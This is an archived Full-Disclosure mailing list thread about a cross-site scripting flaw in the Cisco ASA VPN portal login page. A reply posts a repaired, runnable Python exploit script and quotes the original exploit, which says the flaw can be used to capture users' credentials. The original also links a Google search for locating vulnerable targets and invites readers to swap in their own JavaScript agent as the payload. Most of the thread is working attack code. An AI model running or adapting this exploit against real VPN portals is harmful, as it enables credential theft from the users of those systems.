lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAOOpvAqwULPVbT9r0WcUx9+_yTE7AnptQsNwL9LDENSR3Yu-7w@mail.gmail.com> Date: Thu, 18 Feb 2016 10:03:56 -0600 From: Joey Maresca <jmaresca@...il.com> Cc: fulldisclosure@...lists.org Subject: Re: [FD] Cisco ASA VPN - Zero Day Exploit For folks who want code that runs, I did you all a favor, fixed the ident issues, removed unused libraries, fixed SSL certificate validation checks causing failures, fixed typos that prevent running, killed dead code, made sure it actually used the Port input. All while stripping out the unnecessary fluff. It may not be perfect but it will at least now run. import string, sys import ssl, socket, httplib if __name__ == '__main__': try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target,Port,context=ssl._create_unverified_context()) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco@...il.com> wrote: > # Exploit author: Juan Sacco - jsacco@...loitpack.com > # Affected program: Cisco ASA VPN Portal - Zero Day > # Cisco ASA VPN is prone to a XSS on the password recovery page. > # This vulnerability can be used by an attacker to capture other user's > credentials. > # The password recovery form fails to filter properly the hidden inputs > fields. > # > # This Zero Day exploit has been developed and discovered by Juan Sacco. > # Exploit Pack - Team http://exploitpack.com > # > # Release Dates: > # Reported to Cisco PSIRT Feb 4/2016 > # Cisco Dev Team working on a fix Feb 15/2016 > # Cisco PSIRT report a CVE Feb 15/2016 > # Exploit Pack disclose the bug Feb 15/2016 > # Disclosure of the Exploit Feb 16/2016 > # > # Look for vulnerable targets here: > https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F > # More than 18.000 results in Google only > > import string, sys > import socket, httplib > import telnetlib > > def run(): > try: > Target = sys.argv[1] > Port = int(sys.argv[2]) > # Here goes your custom JS agent code > Payload = "alert(1)" > VulnerableURL = > > "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" > + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" > CraftedRequest = VulnerableURL > # Start the connection > connection = httplib.HTTPSConnection(Target) > connection.request('GET', CraftedRequest) > Response = connection.getresponse() > print "Server status response:", Response.status, Response.reason > data = Response.read() > vulnerable = "Target is not vulnerable" > for line in str(data).splitlines(): > if "juansacco\\\"" in line: > vulnerable = "Targer is vulnerable" > if vulnerable != "Not vulnerable": > print "Result of the test:", vulnerable > # Find the injection on the response > connection.close() > except Exception,e: > print "Exploit connection closed " + str(e) > > if __name__ == '__main__': > print "Cisco VPN ASA Exploit - Zero Day" > print "################################" > print "Author: Juan Sacco - jsacco@...loitpack.com" > > try: > Target = sys.argv[1] > Port = sys.argv[2] > except IndexError: > pass > run() > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists